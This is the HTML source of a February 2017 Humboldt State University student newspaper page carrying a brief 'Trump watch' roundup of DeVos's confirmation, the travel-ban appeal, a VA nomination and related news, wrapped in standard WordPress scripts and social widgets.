<!DOCTYPE html>
<html lang="en-US" prefix="og: http://ogp.me/ns#">
<head>
<meta charset="UTF-8" />
<title>Trump watch | The Lumberjack</title>
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="http://thelumberjack.org/xmlrpc.php" />
<link rel='dns-prefetch' href='//maps.google.com' />
<link rel='dns-prefetch' href='//apis.google.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="The Lumberjack &raquo; Feed" href="http://thelumberjack.org/feed/" />
<link rel="alternate" type="application/rss+xml" title="The Lumberjack &raquo; Comments Feed" href="http://thelumberjack.org/comments/feed/" />
<link rel="alternate" type="text/calendar" title="The Lumberjack &raquo; iCal Feed" href="http://thelumberjack.org/events/?ical=1" />
<link rel="alternate" type="application/rss+xml" title="The Lumberjack &raquo; Trump watch Comments Feed" href="http://thelumberjack.org/2017/02/08/trump-watch/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/thelumberjack.org\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.7.1"}};
			!function(a,b,c){function d(a){var b,c,d,e,f=String.fromCharCode;if(!k||!k.fillText)return!1;switch(k.clearRect(0,0,j.width,j.height),k.textBaseline="top",k.font="600 32px Arial",a){case"flag":return k.fillText(f(55356,56826,55356,56819),0,0),!(j.toDataURL().length<3e3)&&(k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,65039,8205,55356,57096),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,55356,57096),0,0),c=j.toDataURL(),b!==c);case"emoji4":return k.fillText(f(55357,56425,55356,57341,8205,55357,56507),0,0),d=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55357,56425,55356,57341,55357,56507),0,0),e=j.toDataURL(),d!==e}return!1}function e(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i,j=b.createElement("canvas"),k=j.getContext&&j.getContext("2d");for(i=Array("flag","emoji4"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='sweetcaptcha_Stylesheet-css'  href='http://thelumberjack.org/wp-content/plugins/sweetcaptcha-revolutionary-free-captcha-service/css/style.css?ver=4.7.1' type='text/css' media='all' />
<link rel='stylesheet' id='cptch_stylesheet-css'  href='http://thelumberjack.org/wp-content/plugins/captcha/css/front_end_style.css?ver=4.2.8' type='text/css' media='all' />
<link rel='stylesheet' id='dashicons-css'  href='http://thelumberjack.org/wp-includes/css/dashicons.min.css?ver=4.7.1' type='text/css' media='all' />
<link rel='stylesheet' id='cptch_desktop_style-css'  href='http://thelumberjack.org/wp-content/plugins/captcha/css/desktop_style.css?ver=4.2.8' type='text/css' media='all' />
<link rel='stylesheet' id='jquery-ui-css'  href='http://thelumberjack.org/wp-content/plugins/contact-form-maker/css/jquery-ui-1.10.3.custom.css?ver=4.7.1' type='text/css' media='all' />
<link rel='stylesheet' id='jquery-ui-spinner-css'  href='http://thelumberjack.org/wp-content/plugins/contact-form-maker/css/jquery-ui-spinner.css?ver=4.7.1' type='text/css' media='all' />
<link rel='stylesheet' id='form_maker_calendar-jos-css'  href='http://thelumberjack.org/wp-content/plugins/contact-form-maker/css/calendar-jos.css?ver=4.7.1' type='text/css' media='all' />
<link rel='stylesheet' id='form_maker_frontend-css'  href='http://thelumberjack.org/wp-content/plugins/contact-form-maker/css/form_maker_frontend.css?ver=4.7.1' type='text/css' media='all' />
<link rel='stylesheet' id='googlefonts-css'  href='http://fonts.googleapis.com/css?family=Oswald:400,700&subset=latin' type='text/css' media='all' />
<link rel='stylesheet' id='tie-style-css'  href='http://thelumberjack.org/wp-content/themes/jarida/style.css?ver=4.7.1' type='text/css' media='all' />
<link rel='stylesheet' id='GFS+Didot-css'  href='http://fonts.googleapis.com/css?family=GFS+Didot%3Aregular&#038;ver=4.7.1' type='text/css' media='all' />
<link rel='stylesheet' id='Oswald-css'  href='http://fonts.googleapis.com/css?family=Oswald%3Aregular%2C700&#038;ver=4.7.1' type='text/css' media='all' />
<link rel='stylesheet' id='wordpress-popular-posts-css'  href='http://thelumberjack.org/wp-content/plugins/wordpress-popular-posts/style/wpp.css?ver=3.3.4' type='text/css' media='all' />
<link rel='stylesheet' id='tablepress-default-css'  href='http://thelumberjack.org/wp-content/plugins/tablepress/css/default.min.css?ver=1.7' type='text/css' media='all' />
<link rel='stylesheet' id='sedlex_styles-css'  href='http://thelumberjack.org/wp-content/sedlex/inline_styles/50d977f2737fc576af4083ea1b75dce3938463fe.css?ver=20170209' type='text/css' media='all' />
<!-- This site uses the Google Analytics by MonsterInsights plugin v5.5.4 - Universal enabled - https://www.monsterinsights.com/ -->
<script type="text/javascript">
	(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
		(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
		m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
	})(window,document,'script','//www.google-analytics.com/analytics.js','__gaTracker');

	__gaTracker('create', 'UA-84292408-1', 'auto');
	__gaTracker('set', 'forceSSL', true);
	__gaTracker('set', 'anonymizeIp', true);
	__gaTracker('require', 'displayfeatures');
	__gaTracker('send','pageview');

</script>
<!-- / Google Analytics by MonsterInsights -->
<!--[if lte IE 6]> <style type="text/css">.cantembedplus{display:none;}</style><![endif]--><script type='text/javascript'>
/* <![CDATA[ */
var tribe_events_linked_posts = {"post_types":{"tribe_venue":"venue","tribe_organizer":"organizer"}};
/* ]]> */
</script>
<script type='text/javascript' src='http://thelumberjack.org/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script><script>jQueryWP = jQuery;</script>
<script type='text/javascript' src='http://thelumberjack.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-content/plugins/sweetcaptcha-revolutionary-free-captcha-service/js/swtcptcf.js?ver=4.7.1'></script>
<script type='text/javascript' src='https://maps.google.com/maps/api/js?v=3.exp&#038;key&#038;ver=4.7.1'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-content/plugins/contact-form-maker/js/if_gmap_front_end.js?ver=4.7.1'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-content/plugins/contact-form-maker/js/jelly.min.js?ver=4.7.1'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-content/plugins/contact-form-maker/js/file-upload.js?ver=4.7.1'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-content/plugins/contact-form-maker/js/calendar/calendar.js?ver=4.7.1'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-content/plugins/contact-form-maker/js/calendar/calendar_function.js?ver=4.7.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var fm_objectL10n = {"plugin_url":"http:\/\/thelumberjack.org\/wp-content\/plugins\/contact-form-maker"};
/* ]]> */
</script>
<script type='text/javascript' src='http://thelumberjack.org/wp-content/plugins/contact-form-maker/js/main_div_front_end.js?ver=cfm-1.8.39'></script>
<script type='text/javascript' src='https://apis.google.com/js/plusone.js?ver=4.7.1'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-content/sedlex/inline_scripts/6818785009f592a40dcb86a14808c6cc7b06891e.js?ver=20170209'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-includes/js/swfobject.js?ver=2.2-20120417'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-content/plugins/podcasting/player/audio-player-noswfobject.js?ver=2.0'></script>
<link rel='https://api.w.org/' href='http://thelumberjack.org/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://thelumberjack.org/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://thelumberjack.org/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 4.7.1" />
<meta name="generator" content="Seriously Simple Podcasting 1.15.1" />
<link rel="canonical" href="http://thelumberjack.org/2017/02/08/trump-watch/" />
<link rel='shortlink' href='http://thelumberjack.org/?p=16055' />
<link rel="alternate" type="application/json+oembed" href="http://thelumberjack.org/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fthelumberjack.org%2F2017%2F02%2F08%2Ftrump-watch%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://thelumberjack.org/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fthelumberjack.org%2F2017%2F02%2F08%2Ftrump-watch%2F&#038;format=xml" />
		<!-- Podcasting 2.4: http://podcastingplugin.com/ -->
		<script type="text/javascript">
			AudioPlayer.setup("http://thelumberjack.org/wp-content/plugins/podcasting/player/player.swf", {  
				width: 290			});
		</script>
		
<link rel="alternate" type="application/rss+xml" title="Podcast RSS feed" href="http://thelumberjack.org/feed/podcast" />

<style type='text/css' media='screen'>
	h1{ font-family:"Oswald", arial, sans-serif;}
	h2{ font-family:"Oswald", arial, sans-serif;}
	h3{ font-family:"Oswald", arial, sans-serif;}
	h4{ font-family:"Oswald", arial, sans-serif;}
</style>
<!-- fonts delivered by Wordpress Google Fonts, a plugin by Adrian3.com --><link rel="shortcut icon" href="http://thelumberjack.org/wp-content/uploads/2014/04/Screen-Shot-2014-04-14-at-3.06.32-PM-150x150.png" title="Favicon" /><meta property="og:title" content="Trump watch"/>
<meta property="og:type" content="article"/>
<meta property="og:description" content="By | Iridian Casarez

Tuesday 2/7:

Betsy DeVos needed an historic tie-breaking vote cast by Vic..."/>
<meta property="og:url" content="http://thelumberjack.org/2017/02/08/trump-watch/"/>
<meta property="og:site_name" content="The Lumberjack"/>
<!--[if IE]>
<script type="text/javascript">jQuery(document).ready(function (){ jQuery(".menu-item").has("ul").children("a").attr("aria-haspopup", "true");});</script>
<![endif]-->
<!--[if lt IE 9]>
<script src="http://thelumberjack.org/wp-content/themes/jarida/js/html5.js"></script>
<script src="http://thelumberjack.org/wp-content/themes/jarida/js/selectivizr-min.js"></script>
<![endif]-->
<!--[if IE 8]>
<link rel="stylesheet" type="text/css" media="all" href="http://thelumberjack.org/wp-content/themes/jarida/css/ie8.css" />
<![endif]-->
<script type='text/javascript'>
	/* <![CDATA[ */
	var tievar = {'go_to' : 'Go to...'};
	var tie = {"ajaxurl":"http://thelumberjack.org/wp-admin/admin-ajax.php" , "your_rating":"Your Rating:"};
	/* ]]> */
</script>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" />
<style type="text/css" media="screen"> 

body{
background-image: url('http://thelumberjack.org/wp-content/uploads/2014/01/Trees_background2.jpg') !important; 
}

body{
	font-family: 'GFS Didot';
}
	#main-nav ul li.current-menu-item a,
	#main-nav ul li.current-menu-item a:hover,
	#main-nav ul li.current-menu-parent a,
	#main-nav ul li.current-menu-parent a:hover,
	#main-nav ul li.current-page-ancestor a,
	#main-nav ul li.current-page-ancestor a:hover,
	.pagination span.current,
	.ei-slider-thumbs li.ei-slider-element,
	.breaking-news span,
	.ei-title h2,h2.cat-box-title,
	a.more-link,.scroll-nav a,
	.flex-direction-nav a,
	.tagcloud a:hover,
	#tabbed-widget ul.tabs li.active a,
	.slider-caption h2, .full-width .content .slider-caption h2,
	.review-percentage .review-item span span,.review-final-score,
	.woocommerce span.onsale, .woocommerce-page span.onsale ,
	.woocommerce .widget_price_filter .ui-slider .ui-slider-handle, .woocommerce-page .widget_price_filter .ui-slider .ui-slider-handle,
	.button,a.button,#main-content input[type="submit"],#main-content input[type="submit"]:focus, span.onsale {
		background-color:#056937 !important;
	}
	::-webkit-scrollbar-thumb{background-color:#056937 !important;}
	#main-nav,.top-nav {border-bottom-color: #056937;}
	.cat-box , .footer-bottom .container{border-top-color: #056937;}
a {
		text-decoration: none;}
a:hover {
	color: #595659;	text-decoration: underline;}
.top-nav ul li a , .top-nav ul ul a {
		text-shadow: 0 1px 1px #056a37 !important;}

	#main-nav ul li.current-menu-item a,
	#main-nav ul li.current-menu-item a:hover,
	#main-nav ul li.current-menu-parent a,
	#main-nav ul li.current-menu-parent a:hover,
	#main-nav ul li.current-page-ancestor a,
	#main-nav ul li.current-page-ancestor a:hover,
	.pagination span.current,
	.ei-slider-thumbs li.ei-slider-element,
	.breaking-news span,
	.ei-title h2,h2.cat-box-title,
	a.more-link,.scroll-nav a,
	.flex-direction-nav a,
	.tagcloud a:hover,
	#tabbed-widget ul.tabs li.active a,
	.slider-caption h2, .full-width .content .slider-caption h2,
	.review-percentage .review-item span span,.review-final-score,
	.woocommerce span.onsale, .woocommerce-page span.onsale ,
	.woocommerce .widget_price_filter .ui-slider .ui-slider-handle, .woocommerce-page .widget_price_filter .ui-slider .ui-slider-handle,
	.button,a.button,#main-content input[type="submit"],#main-content input[type="submit"]:focus, span.onsale {
		background-color:#056937 !important;
	}
	::-webkit-scrollbar-thumb{background-color:#056937 !important;}
	#main-nav,.top-nav {border-bottom-color: #056937;}
	.cat-box , .footer-bottom .container{border-top-color: #056937;}


</style> 

				<!-- WordPress Popular Posts v3.3.4 -->
				<script type="text/javascript">

					var sampling_active = 0;
					var sampling_rate   = 100;
					var do_request = false;

					if ( !sampling_active ) {
						do_request = true;
					} else {
						var num = Math.floor(Math.random() * sampling_rate) + 1;
						do_request = ( 1 === num );
					}

					if ( do_request ) {

						/* Create XMLHttpRequest object and set variables */
						var xhr = ( window.XMLHttpRequest )
						  ? new XMLHttpRequest()
						  : new ActiveXObject( "Microsoft.XMLHTTP" ),
						url = 'http://thelumberjack.org/wp-admin/admin-ajax.php',
						params = 'action=update_views_ajax&token=c51bdd0365&wpp_id=16055';
						/* Set request method and target URL */
						xhr.open( "POST", url, true );
						/* Set request header */
						xhr.setRequestHeader( "Content-type", "application/x-www-form-urlencoded" );
						/* Hook into onreadystatechange */
						xhr.onreadystatechange = function() {
							if ( 4 === xhr.readyState && 200 === xhr.status ) {
								if ( window.console && window.console.log ) {
									window.console.log( xhr.responseText );
								}
							}
						};
						/* Send request */
						xhr.send( params );

					}

				</script>
				<!-- End WordPress Popular Posts v3.3.4 -->
					<link rel="alternate" type="application/rss+xml" title="Podcast: KRFH News" href="http://thelumberjack.org/feed/podcast/" />
</head>
<body id="top" class="post-template-default single single-post postid-16055 single-format-standard tribe-no-js">
	<div class="background-cover"></div>
	<div class="wrapper full-site">
				<div class="top-nav fade-in animated1 head_brnews">
			<div class="container">
				<div class="search-block">
					<form method="get" id="searchform" action="http://thelumberjack.org/">
						<button class="search-button" type="submit" value="Search"></button>	
						<input type="text" id="s" name="s" value="Search..." onfocus="if (this.value == 'Search...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Search...';}"  />
					</form>
				</div><!-- .search-block /-->
						<div class="social-icons icon_flat">
		<a class="tooldown" title="Facebook" href="http://www.facebook.com/HSULumberjack" target="_blank"><i class="tieicon-facebook"></i></a><a class="tooldown" title="Twitter" href="http://twitter.com/HSULumberjack" target="_blank"><i class="tieicon-twitter"></i></a><a class="tooldown" title="Flickr" href="http://flickr.com/thejacknews" target="_blank"><i class="tieicon-flickr"></i></a><a class="tooldown" title="Tumblr" href="http://hsulumberjack.tumblr.com/" target="_blank"><i class="tieicon-tumblr"></i></a><a class="tooldown" title="instagram" href="http://instagram.com/hsulumberjack" target="_blank"><i class="tieicon-instagram"></i></a>	</div>

				
					
	<div class="breaking-news">
		<span>Don't Miss</span>
				
					<ul>
							<li><a href="http://thelumberjack.org/2017/02/08/a-master-plan-for-free-tuition/" title="A master plan for free tuition">A master plan for free tuition</a></li>
							<li><a href="http://thelumberjack.org/2017/02/08/the-moodle-to-canvas-switch/" title="The Moodle to Canvas switch">The Moodle to Canvas switch</a></li>
							<li><a href="http://thelumberjack.org/2017/02/08/this-week-in-news-2/" title="This week in news">This week in news</a></li>
							<li><a href="http://thelumberjack.org/2017/02/08/trump-watch/" title="Trump watch">Trump watch</a></li>
							<li><a href="http://thelumberjack.org/2017/02/08/mellow-out-with-meditation/" title="Mellow out with meditation">Mellow out with meditation</a></li>
							<li><a href="http://thelumberjack.org/2017/02/08/small-time-work-turns-into-full-time-closure/" title="Small time work turns into full time closure">Small time work turns into full time closure</a></li>
							<li><a href="http://thelumberjack.org/2017/02/01/trump-watch-123-131/" title="Trump Watch 1/23-1/31">Trump Watch 1/23-1/31</a></li>
							<li><a href="http://thelumberjack.org/2017/02/01/world-in-briefs-jan-24-to-feb-1/" title="World in Briefs Jan. 24 to Feb. 1">World in Briefs Jan. 24 to Feb. 1</a></li>
							<li><a href="http://thelumberjack.org/2017/02/01/hsu-students-solve-problems/" title="HSU Students solve problems">HSU Students solve problems</a></li>
							<li><a href="http://thelumberjack.org/2017/02/01/q-a-with-tim-lister-cnn-producer/" title="Q &#038; A with Tim Lister CNN producer">Q &#038; A with Tim Lister CNN producer</a></li>
						</ul>
					
						<script type="text/javascript">
			jQuery(document).ready(function(){
								createTicker(); 
							});
		</script>
	</div> <!-- .breaking-news -->				
			</div>
		</div><!-- .top-menu /-->
				

		<div class="container">	
		<header id="theme-header">
		<div class="header-content fade-in animated1">
			<div class="logo" style="margin-top:3px">
			<h2>								<a title="The Lumberjack" href="http://thelumberjack.org/">
					<img src="http://thelumberjack.org/wp-content/uploads/2016/01/webmasthead-copy-1024x180.jpg" alt="The Lumberjack" /><strong>The Lumberjack Serving the Humboldt State University campus and community since 1929</strong>
				</a>
			</h2>			</div><!-- .logo /-->
			<div class="ads-top">					
			<a href="http://www2.humboldt.edu/associatedstudents/about/get-involved" title="Would you like to advertise on The Lumberjack's website? Contact us at (707) 826-3259 or email us at LJNPads@humboldt.edu." target="_blank">
				<img src="http://thelumberjack.org/wp-content/uploads/2016/10/Associated-Students-web-ad-2.gif" alt="Would you like to advertise on The Lumberjack's website? Contact us at (707) 826-3259 or email us at LJNPads@humboldt.edu." />
			</a>
				</div>			<div class="clear"></div>
		</div>	
									<nav id="main-nav" class="fade-in animated2">
				<div class="container">				
				<div class="main-menu"><ul id="menu-featured" class="menu"><li id="menu-item-555" class="menu-item  menu-item-type-taxonomy  menu-item-object-category  current-post-ancestor  current-menu-parent  current-post-parent"><a href="http://thelumberjack.org/category/news/">News</a></li>
<li id="menu-item-556" class="menu-item  menu-item-type-taxonomy  menu-item-object-category"><a href="http://thelumberjack.org/category/life_and_arts/">Life &#038; Arts</a></li>
<li id="menu-item-11714" class="menu-item  menu-item-type-taxonomy  menu-item-object-category"><a href="http://thelumberjack.org/category/science/">Science</a></li>
<li id="menu-item-557" class="menu-item  menu-item-type-taxonomy  menu-item-object-category"><a href="http://thelumberjack.org/category/sports/">Sports</a></li>
<li id="menu-item-558" class="menu-item  menu-item-type-taxonomy  menu-item-object-category"><a href="http://thelumberjack.org/category/opinion/">Opinion</a></li>
<li id="menu-item-15406" class="menu-item  menu-item-type-custom  menu-item-object-custom"><a href="http://thelumberjack.org/events/">Events</a></li>
<li id="menu-item-5937" class="menu-item  menu-item-type-post_type  menu-item-object-page"><a href="http://krfh.net/" onclick="__gaTracker('send', 'event', 'outbound-widget', 'http://krfh.net/', 'KRFH');">KRFH</a></li>
<li id="menu-item-2405" class="menu-item  menu-item-type-post_type  menu-item-object-page"><a href="http://thelumberjack.org/advertise-with-us/">Advertise with us</a></li>
<li id="menu-item-2406" class="menu-item  menu-item-type-post_type  menu-item-object-page  menu-item-has-children"><a href="http://thelumberjack.org/contact/">Contact</a>
<ul class="sub-menu">
	<li id="menu-item-2407" class="menu-item  menu-item-type-post_type  menu-item-object-page"><a href="http://thelumberjack.org/contact/contact-our-editorial-staff/">Contact Our Editorial Staff</a></li>
	<li id="menu-item-563" class="menu-item  menu-item-type-taxonomy  menu-item-object-category"><a href="http://thelumberjack.org/category/staff-bios/">Staff Bios</a></li>
</ul> <!--End Sub Menu -->
</li>
</ul></div>				</div>
			</nav><!-- .main-nav /-->
		</header><!-- #header /-->
	
	<div id="main-content" class="container fade-in animated3 sidebar-narrow-right"><div class="content-wrap">
	<div class="content">
		<div xmlns:v="http://rdf.data-vocabulary.org/#"  id="crumbs"><span typeof="v:Breadcrumb"><a rel="v:url" property="v:title" class="crumbs-home" href="http://thelumberjack.org"><i class="tieicon-home"></i>Home</a></span> / <span typeof="v:Breadcrumb"><a rel="v:url" property="v:title" href="http://thelumberjack.org/category/news/">News</a></span> / <span class="current">Trump watch</span></div>		
		
				
				
						
		<article class="post-listing post-16055 post type-post status-publish format-standard hentry category-news tag-betsy-devos tag-devos tag-shulkin tag-trump-golfing tag-trump-watch">
				

			<div class="post-inner">
				<h1 class="name post-title entry-title" itemprop="itemReviewed" itemscope itemtype="http://schema.org/Thing"><span itemprop="name">Trump watch</span></h1>

						
<p class="post-meta">
	
	<span class="post-cats">in  <a href="http://thelumberjack.org/category/news/" rel="category tag">News</a></span>
	
		
	 <span class="tie-date">16 hours ago</span>	
	<span class="post-comments"><a href="http://thelumberjack.org/2017/02/08/trump-watch/#comments">1 Comment</a></span>
<span class="post-views">107 Views</span> </p>
<div class="clear"></div>
	
				<div class="entry">
					
							<input type='hidden' class='forceUpdateSocialLinkz_id' value='16055'/>
				<input type='hidden' class='forceUpdateSocialLinkz_id' value='16055'/>
		<div class='social_linkz'>   							<span id="fb-root"></span><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script><fb:like href="http://thelumberjack.org/2017/02/08/trump-watch/" send="false" layout="button_count" width="35" show_faces="false" action="like" font=""></fb:like>								<a href="http://twitter.com/share" class="twitter-share-button" data-text="[Blog] Trump watch - http://thelumberjack.org/?p=16055 (via )" data-url="http%3A%2F%2Fthelumberjack.org%2F%3Fp%3D16055" data-count="none"  >Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>									<a rel="nofollow" target="_blank" href="#" title="Print this page">						<img onclick="window.print();return false;" class="lnk_social_linkz" src="http://thelumberjack.org/wp-content/plugins//social-linkz/img/lnk_print.png" alt="Print" height="24" width="24"/></a>										<a rel="nofollow" target="_blank" href="#" title="Mail">						<img onclick="openEmailSocialLinkz('76842a82442b5b6b9970cc33cb3102f74592507d');return false;" class="lnk_social_linkz" src="http://thelumberjack.org/wp-content/plugins//social-linkz/img/lnk_mail.png" alt="Mail" height="24" width="24"/></a>					<div id="mask76842a82442b5b6b9970cc33cb3102f74592507d" class="social_mask"></div>					<div id="dialog76842a82442b5b6b9970cc33cb3102f74592507d" class="social_window">						<div id="innerdialog76842a82442b5b6b9970cc33cb3102f74592507d">							<h3>Send this article by email</h3>							<p class='textEmailSocialLinkz'>What is your name?</p>							<p><input name="nameSocialLinkz76842a82442b5b6b9970cc33cb3102f74592507d" id="nameSocialLinkz76842a82442b5b6b9970cc33cb3102f74592507d" /></p>							<p class='textEmailSocialLinkz'>Please indicate below the emails to which you want to send this article: <b>Trump watch</b></p>							<p><textarea name="emailSocialLinkz76842a82442b5b6b9970cc33cb3102f74592507d" id="emailSocialLinkz76842a82442b5b6b9970cc33cb3102f74592507d" rows="5"></textarea></p>							<p class='closeEmailSocialLinkz'>Enter one email per line. No more than 5 emails.</p>							<p class='sendEmailSocialLinkz'><a href="#" title="Close" onclick="sendEmailSocialLinkz('76842a82442b5b6b9970cc33cb3102f74592507d', 16055);return false;"><span class='sendEmailSocialLinkz'>Send</span></a></p>						</div>						<p class='closeEmailSocialLinkz'><a href="#" title="Close" onclick="closeEmailSocialLinkz('76842a82442b5b6b9970cc33cb3102f74592507d');return false;"><span class='closeEmailSocialLinkz'>Close</span></a></p>					</div>							</div><p>By | Iridian Casarez</p>
<p><b>Tuesday 2/7:</b></p>
<p><span style="font-weight: 400;">Betsy DeVos needed an historic tie-breaking vote cast by Vice President Mike Pence to become the Secretary of Education. The 51-50 vote saw two senate republicans vote against DeVos, possibly foreshadowing a fracture within party lines in light of Trump’s recent unprecedented actions.</span></p>
<p><span style="font-weight: 400;">The Army Corps of Engineers completed its review of the 1,172 mile NDAP, a step that Trump ordered in a January 24 executive order. The Trump administration approved an easement for the project, essentially repurposing the land the NDAP will pass through. </span></p>
<p><span style="font-weight: 400;">The Senate Veteran’s Affairs Committee approved David Shulkin to be the Veteran’s Affairs Secretary. Shulkin will now enter the senate confirmation phase where he is expected to be appoi</span><span style="font-weight: 400;">nted VA secretary. </span></p>
<p><span style="font-weight: 400;">The 9th Circuit Court of Appeals is to hear the challenge to President Trump’s Muslim ban. Three federal judges are to hear oral arguments to challenge the executive order on immigration on Tuesday. The decision will determine the fate </span><span style="font-weight: 400;">of the nationwide temporary restraining order against Trump&#8217;s travel ban.</span></p>
<p><b> Watch for:</b></p>
<p>Trump&#8217;s executive order regarding stricter cyber security measures is expected to be signed this week. The order has seen repeated delays since Trump entered office. Should it be signed into action, the order would call for various heads of state to increase measures within their departments. The goal of the order is to have tighter cybersecurity.</p>
<p><b>This week in Trumptown:</b></p>
<p><span style="font-weight: 400;">Trump went golfing just two weeks into his tenure as President. Former President Obama made it four months, and his predecessor Bush made it five and a half months.</span></p>
<div style="clear:both"></div><div class='social_linkz'>   							<span id="fb-root"></span><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script><fb:like href="http://thelumberjack.org/2017/02/08/trump-watch/" send="false" layout="button_count" width="35" show_faces="false" action="like" font=""></fb:like>								<a href="http://twitter.com/share" class="twitter-share-button" data-text="[Blog] Trump watch - http://thelumberjack.org/?p=16055 (via )" data-url="http%3A%2F%2Fthelumberjack.org%2F%3Fp%3D16055" data-count="none"  >Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>									<a rel="nofollow" target="_blank" href="#" title="Print this page">						<img onclick="window.print();return false;" class="lnk_social_linkz" src="http://thelumberjack.org/wp-content/plugins//social-linkz/img/lnk_print.png" alt="Print" height="24" width="24"/></a>										<a rel="nofollow" target="_blank" href="#" title="Mail">						<img onclick="openEmailSocialLinkz('0ef53842171feb8280c02781093db302901571ba');return false;" class="lnk_social_linkz" src="http://thelumberjack.org/wp-content/plugins//social-linkz/img/lnk_mail.png" alt="Mail" height="24" width="24"/></a>					<div id="mask0ef53842171feb8280c02781093db302901571ba" class="social_mask"></div>					<div id="dialog0ef53842171feb8280c02781093db302901571ba" class="social_window">						<div id="innerdialog0ef53842171feb8280c02781093db302901571ba">							<h3>Send this article by email</h3>							<p class='textEmailSocialLinkz'>What is your name?</p>							<p><input name="nameSocialLinkz0ef53842171feb8280c02781093db302901571ba" id="nameSocialLinkz0ef53842171feb8280c02781093db302901571ba" /></p>							<p class='textEmailSocialLinkz'>Please indicate below the emails to which you want to send this article: <b>Trump watch</b></p>							<p><textarea name="emailSocialLinkz0ef53842171feb8280c02781093db302901571ba" id="emailSocialLinkz0ef53842171feb8280c02781093db302901571ba" rows="5"></textarea></p>							<p class='closeEmailSocialLinkz'>Enter one email per line. No more than 5 emails.</p>							<p class='sendEmailSocialLinkz'><a href="#" title="Close" onclick="sendEmailSocialLinkz('0ef53842171feb8280c02781093db302901571ba', 16055);return false;"><span class='sendEmailSocialLinkz'>Send</span></a></p>						</div>						<p class='closeEmailSocialLinkz'><a href="#" title="Close" onclick="closeEmailSocialLinkz('0ef53842171feb8280c02781093db302901571ba');return false;"><span class='closeEmailSocialLinkz'>Close</span></a></p>					</div>							</div>										
					
									</div><!-- .entry /-->
				<span style="display:none"><a href="http://thelumberjack.org/tag/betsy-devos/" rel="tag">betsy devos</a> <a href="http://thelumberjack.org/tag/devos/" rel="tag">devos</a> <a href="http://thelumberjack.org/tag/shulkin/" rel="tag">shulkin</a> <a href="http://thelumberjack.org/tag/trump-golfing/" rel="tag">trump golfing</a> <a href="http://thelumberjack.org/tag/trump-watch/" rel="tag">trump watch</a></span>				<span style="display:none" class="updated">2017-02-08</span>
								<div style="display:none" class="vcard author" itemprop="author" itemscope itemtype="http://schema.org/Person"><strong class="fn" itemprop="name"><a href="http://thelumberjack.org/author/cfr70/" title="Posts by Claire Roth" rel="author">Claire Roth</a></strong></div>
								
				<div class="share-post">
	<script>
	window.___gcfg = {lang: 'en-US'};
	(function(w, d, s) {
	  function go(){
		var js, fjs = d.getElementsByTagName(s)[0], load = function(url, id) {
		  if (d.getElementById(id)) {return;}
		  js = d.createElement(s); js.src = url; js.id = id;
		  fjs.parentNode.insertBefore(js, fjs);
		};
		load('//connect.facebook.net/en/all.js#xfbml=1', 'fbjssdk');
		load('https://apis.google.com/js/plusone.js', 'gplus1js');
